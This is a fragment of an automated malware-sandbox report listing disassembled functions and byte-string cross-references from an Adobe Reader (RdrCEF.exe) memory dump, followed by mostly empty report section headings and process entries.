]J;, xrefs: 3C137B6B
Iw;, xrefs: 3C13794A
]J;, xrefs: 3C13799E
]J;, xrefs: 3C137BC7
]J;, xrefs: 3C137B02
`AW, xrefs: 3C137901
]J;, xrefs: 3C137BFC

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C137DC0, Relevance: 6.5, Strings: 5, Instructions: 212

Strings

]J;, xrefs: 3C137F19
]J;, xrefs: 3C138072
`AW, xrefs: 3C137E63
Iw;, xrefs: 3C137F94
Iw;, xrefs: 3C137EAC

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C146540, Relevance: 6.4, Strings: 5, Instructions: 174

Strings

Iw;, xrefs: 3C146697
]J;, xrefs: 3C1467B4
Iw;, xrefs: 3C146629
]J;, xrefs: 3C1467E9
`AW, xrefs: 3C1465E0

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C131C40, Relevance: 6.3, Strings: 5, Instructions: 73

Strings

9;, xrefs: 3C131D1D
;, xrefs: 3C131CBB
;, xrefs: 3C131CF3
;, xrefs: 3C131C71
;, xrefs: 3C131CAB

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C1424E0, Relevance: 5.3, Strings: 4, Instructions: 322

Strings

X;, xrefs: 3C142678
]J;, xrefs: 3C1426D6
]/;, xrefs: 3C142614
y(;, xrefs: 3C1428C3

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C11C880, Relevance: 5.2, Strings: 4, Instructions: 224

Strings

JW, xrefs: 3C11CB3F
JW, xrefs: 3C11CB12
JW, xrefs: 3C11CB97
JW, xrefs: 3C11CB6B

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C134F20, Relevance: 5.1, Strings: 4, Instructions: 103

Strings

0UkW, xrefs: 3C135076
]J;, xrefs: 3C135003
`AW, xrefs: 3C134FC2
!p;, xrefs: 3C134FCF

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Function 3C135D20, Relevance: 5.1, Strings: 4, Instructions: 89

Strings

q`r>, xrefs: 3C135D36
i`r>, xrefs: 3C135E46
i`r>, xrefs: 3C135E34
Iar>, xrefs: 3C135DDA

Memory Dump Source

Source File: 00000005.00000002.1400416782.3C10A000.00000040.sdmp, Offset: 3C10A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3c10a000_RdrCEF.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

Boot Survival:

Stealing of Sensitive Information:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Lowering of HIPS / PFW / Operating System Security Settings:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static PDF Info

General

Keywords Statistics

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: AcroRd32.exe PID: 4068 Parent PID: 3460

General

Analysis Process: AcroRd32.exe PID: 3036 Parent PID: 4068

General

Analysis Process: RdrCEF.exe PID: 3632 Parent PID: 4068